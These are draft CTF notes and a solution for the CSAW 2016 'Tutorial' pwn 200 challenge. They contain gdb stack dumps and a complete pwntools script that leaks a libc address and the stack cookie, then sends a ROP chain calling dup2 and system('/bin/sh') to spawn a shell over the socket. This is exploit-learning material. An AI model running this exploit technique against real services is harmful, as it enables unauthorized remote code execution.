CSAW 2016 Tutorial pwn 200 (Draft)

thinking.txt


FIrst neeed to make a local user called tutorial with home dir


run binary and connect on localhost

what is getpwnam?

-Tutorial-
1.Manual
2.Practice
3.Quit
>1
Reference:0x7ffff7898490
-Tutorial-
1.Manual
2.Practice
3.Quit
>2

buffer overflow in  2.Practice


gdb-peda$ x/100wx 0x7fffffffe0e0
0x7fffffffe0e0: 0x41414141 0x0000000a 0x00000000 0x00000000
0x7fffffffe0f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe100: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe110: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe120: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe130: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe140: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe150: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe160: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe170: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe180: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe190: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe200: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe210: 0x00000000 0x00000000 0xa9acfd00 0x4042b240 <cookie
0x7fffffffe220: 0xffffe250 0x00007fff 0x00401053 0x00000000 <read up to first chunk
0x7fffffffe230: 0x00000003 0x00000000 0x00401401 0x00000004
0x7fffffffe240: 0xf7fd0a32 0x00007fff 0xf7bd4e00 0x00007fff
0x7fffffffe250: 0xffffe2c0 0x00007fff 0x00401257 0x00000000
0x7fffffffe260: 0xffffe3a8 0x00007fff 0xf7ff79b0 0x00000002
gdb-peda$ i f
Stack level 0, frame at 0x7fffffffe230:
 rip = 0x400f70 in func2; saved rip = 0x401053
 called by frame at 0x7fffffffe260
 Arglist at 0x7fffffffe220, args: 
 Locals at 0x7fffffffe220, Previous frame's sp is 0x7fffffffe230
 Saved registers:
  rbp at 0x7fffffffe220, rip at 0x7fffffffe228


gdb-peda$ distance 0x7fffffffe0e0 0x7fffffffe228
From 0x7fffffffe0e0 to 0x7fffffffe228: 328 bytes, 82 dwords



328 A's then eip


stack cookies!

This is what 'reference' is
  v1 = dlsym((void *)0xFFFFFFFF, "puts");
  write(a1, "Reference:", 0xAuLL);
  sprintf(&s, "%p\n", (char *)v1 - 1280);
  write(a1, &s, 0xFuLL);

 address of puts?
 ok then

write(a1, ">", 1uLL);
  read(a1, &s, 460uLL);
  write(a1, &s, 324uLL);

/lib/x86_64-linux-gnu/libc-2.19.so

 it reads out the stack cookie to me! yay

0x7fffffffe200: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe210: 0x00000000 0x00000000 0xa9acfd00 0x4042b240 <cookie
0x7fffffffe220: 0xffffe250 0x00007fff 0x00401053 0x00000000 <read up to first chunk
0x7fffffffe230: 0x00000003 0x00000000 0x00401401 0x00000004


so send 312 many 'A's that will put it just up against the stack 
cookie
then I will read it
then I will do it again but sub the cookie in + eip





0x7fffffffe000: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe030: 0x00000000 0x00000000 0xf7ddb0f0 0x00007fff
0x7fffffffe040: 0xf7dd0000 0x00007fff 0x00000000 0x00000000
0x7fffffffe050: 0x00000000 0x00000000 0xf7ffe500 0x00007fff
0x7fffffffe060: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe070: 0xa5b50f0b 0x00000000 0x0040066c 0x00000000
0x7fffffffe080: 0xffffffff 0x00000000 0x00000000 0x00000000
0x7fffffffe090: 0xf7831b38 0x00007fff 0xf7bd1760 0x00007fff
0x7fffffffe0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0c0: 0xffffe220 0x00007fff 0x00400f54 0x00000000
0x7fffffffe0d0: 0xffffe3a0 0x00007fff 0xf787deb7 0x00000004
0x7fffffffe0e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe100: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe110: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe120: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe130: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe140: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe150: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe160: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe170: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe180: 0x00000000 0x00000000 0x00000000 0x00000000
gdb-peda$ 
0x7fffffffe190: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe200: 0x00000000 0x00000000 0x00000000 0x41414141
0x7fffffffe210: 0x41414141 0x0a3a3a3a 0x64605000 0xdc70460a
0x7fffffffe220: 0xffffe250 0x00007fff 0x00401053 0x00000000
0x7fffffffe230: 0x00000000 0x00000000 0x00401401 0x00000004
0x7fffffffe240: 0xffff0a32 0x00007fff 0xf7bd4e00 0x00007fff
0x7fffffffe250: 0xffffe2c0 0x00007fff 0x00401257 0x00000000
0x7fffffffe260: 0xffffe3a8 0x00007fff 0xf7ff79b0 0x00000002
0x7fffffffe270: 0xf7ffe1a8 0x00000000 0x00000000 0x00000010
0x7fffffffe280: 0x00000003 0x00000004 0x00000000 0x00000000
0x7fffffffe290: 0xd3040002 0x00000000 0x00000000 0x00000000
0x7fffffffe2a0: 0xec9a0002 0x0100007f 0x00000000 0x00000000
0x7fffffffe2b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2f0: 0x00000000 0x00000000 0x4e19b21d 0x2f80f992
0x7fffffffe300: 0x00400c90 0x00000000 0xffffe3a0 0x00007fff
0x7fffffffe310: 0x00000000 0x00000000 0x00000000 0x00000000



after 

gdb-peda$ x/100wx 0x7fffffffe000
0x7fffffffe000: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe030: 0x00000000 0x00000000 0xf7ddb0f0 0x00007fff
0x7fffffffe040: 0xf7dd0000 0x00007fff 0x00000000 0x00000000
0x7fffffffe050: 0x00000000 0x00000000 0xf7ffe500 0x00007fff
0x7fffffffe060: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe070: 0xa5b50f0b 0x00000000 0x0040066c 0x00000000
0x7fffffffe080: 0xffffffff 0x00000000 0x00000000 0x00000000
0x7fffffffe090: 0xf7831b38 0x00007fff 0xf7bd1760 0x00007fff
0x7fffffffe0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0c0: 0xffffe220 0x00007fff 0x00400f70 0x00000000
0x7fffffffe0d0: 0xffffe3a0 0x00007fff 0xf787deb7 0x00000004
0x7fffffffe0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe100: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe110: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe120: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe130: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe140: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe150: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
gdb-peda$ 
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1c0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1d0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe200: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe210: 0x41414141 0x3a3a3a3a 0x64605000 0xdc70460a
0x7fffffffe220: 0xffffe250 0x00007fff 0xf7898990 0x00007fff
0x7fffffffe230: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe240: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe250: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe260: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe270: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe280: 0x0000000a 0x00000004 0x00000000 0x00000000
0x7fffffffe290: 0xd3040002 0x00000000 0x00000000 0x00000000
0x7fffffffe2a0: 0xec9a0002 0x0100007f 0x00000000 0x00000000
0x7fffffffe2b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2f0: 0x00000000 0x00000000 0x4e19b21d 0x2f80f992
0x7fffffffe300: 0x00400c90 0x00000000 0xffffe3a0 0x00007fff
0x7fffffffe310: 0x00000000 0x00000000 0x00000000 0x00000000



on ret

gdb-peda$ x/100wx 0x7fffffffe000
0x7fffffffe000: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe030: 0x00000000 0x00000000 0xf7ddb0f0 0x00007fff
0x7fffffffe040: 0xf7dd0000 0x00007fff 0x00000000 0x00000000
0x7fffffffe050: 0x00000000 0x00000000 0xf7ffe500 0x00007fff
0x7fffffffe060: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe070: 0xa5b50f0b 0x00000000 0x0040066c 0x00000000
0x7fffffffe080: 0xffffffff 0x00000000 0x00000000 0x00000000
0x7fffffffe090: 0xf7831b38 0x00007fff 0xf7bd1760 0x00007fff
0x7fffffffe0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0c0: 0xffffe220 0x00007fff 0x00400f8c 0x00000000
0x7fffffffe0d0: 0xffffe3a0 0x00007fff 0xf787deb7 0x00000004
0x7fffffffe0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe100: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe110: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe120: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe130: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe140: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe150: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
gdb-peda$ 
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1c0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1d0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe200: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe210: 0x41414141 0x3a3a3a3a 0x64605000 0xdc70460a
0x7fffffffe220: 0xffffe250 0x00007fff 0xf7898990 0x00007fff
0x7fffffffe230: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe240: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe250: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe260: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe270: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe280: 0x0000000a 0x00000004 0x00000000 0x00000000
0x7fffffffe290: 0xd3040002 0x00000000 0x00000000 0x00000000
0x7fffffffe2a0: 0xec9a0002 0x0100007f 0x00000000 0x00000000
0x7fffffffe2b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2f0: 0x00000000 0x00000000 0x4e19b21d 0x2f80f992
0x7fffffffe300: 0x00400c90 0x00000000 0xffffe3a0 0x00007fff
0x7fffffffe310: 0x00000000 0x00000000 0x00000000 0x00000000




So what was happening was that puts was pushing rbx onto the stack and 
calling strcpy which then segfaulted
I figgure I need to put &/bin/sh into ebx


# 0x004012e1 : (5e415fc3) pop rsi; pop r15; ret
# 0x00400d49 : (01f3c3) add ebx,esi; ret

this will accomplish this



nope nope nope

lets go strait to system
so we need to set 

# rdi rsi 
to call system

put addr of /bin/sh in rdi call system

tried that
pops shell locally ... on the server side

need to dup dup dup

dup = 0x7ffff7909460 - 0x7ffff7898490 + int(ref,16)

use same leak trick
hope it works XD


rdi already has the file descriptor 
so that's helpfull
:)

dup2(old,new)

need to 
dup2(fd,0)
dup2(fd,1)
dup2(fd,2)

k so I can pop a shell locally




fuk I'm like so close

I need to find /bin/sh on the box

puts 0x7f620ea3a990
binsh 0x7f620eb329a0

puts - binsh = 
0xf8010

in the lib c 
puts 0x06b990
binsh_l 0x01639a0


#!/usr/bin/python

import sys
from pwn import *
with open('payload', 'w') as f:
 f.write('')

def send(conn, line):
 print line
 conn.sendline(line)

 with open('payload', 'a') as f:
  line += '\x0a' # fuck you :)
  f.write(line)

# conn = remote("pwn.chal.csaw.io",8002)
conn = remote("localhost", int(sys.argv[1]))
print conn.recvuntil(">")
send(conn, "1")
print conn.recvuntil("Reference:")
ref = conn.recvuntil("\n")
print ref
print conn.recvuntil(">")
send(conn, "2")
# raw_input("continue?")
send(conn, "A"*(312-4)+":::")
print conn.recvuntil(":::")
cookie = conn.recvuntil("-Tutorial-")[:-len("-Tutorial-")].lstrip()[:-4]

print cookie
print cookie.encode('hex')
print hex(u64(cookie))

print conn.recvuntil(">")

#0x400eef: dec ecx; ret
misc_rop = p64(0x400eef)

# [heap] : 0x603035 --> 0x68732f6e69622f ('/bin/sh')
#   libc : 0x7ffff79909a0 --> 0x68732f6e69622f ('/bin/sh')


# 0x7ffff7898490 ref
puts_libc = int(ref,16)+1280
puts = p64(puts_libc)

# b = 0x7ffff79909a0 - 0x7ffff7898490 + int(ref,16)
# addr_binsh = p64(b)

# dup2 = p64(0x7ffff7909490 - 0x7ffff7898490 + int(ref,16))
# system = p64(0x7ffff786e490- 0x7ffff7898490 + int(ref,16))

# puts 000000000006fd60
# system 0000000000046590
# dup2 00000000000ebe90

sysMputs = 0x46590 - 0x6fd60
dupMputs = 0xebe90 - 0x6fd60

system = p64(puts_libc + sysMputs)
dup2 = p64(puts_libc + dupMputs)



addr_binsh = p64(0x603035)
ebp = p64(0x00007fffffffe250)


# # null
# null = p64(0x400007)

# 0x004012e1 : (5e415fc3) pop rsi; pop r15; ret
# 0x00400d49 : (01f3c3) add ebx,esi; ret
rop_pop_rsi_pop = p64(0x004012e1)
rop_add_ebx_esi = p64(0x00400d49)
#0x4012dc: pop r12; pop r13; pop r14; pop r15; ret
#0x4012e3: pop rdi; ret
pop_rdi = p64(0x4012e3)
pops = p64(0x4012dc)
print ref

# rdi rsi 

# rdi is already the fd for socket :) yay
send(conn, "2")
payload = "A"*(312-4)+"::::" + cookie + ebp
# dup2(fd, stdin)
payload += rop_pop_rsi_pop + p64(0) + "A"*8 + dup2
payload += rop_pop_rsi_pop + p64(1) + "A"*8 + dup2
payload += rop_pop_rsi_pop + p64(2) + "A"*8 + dup2
payload += pop_rdi + addr_binsh +  system
send(conn,  payload)
send(conn,  "ls -la")


conn.interactive()






FLAG{3ASY_R0P_R0P_P0P_P0P_YUM_YUM_CHUM_CHUM}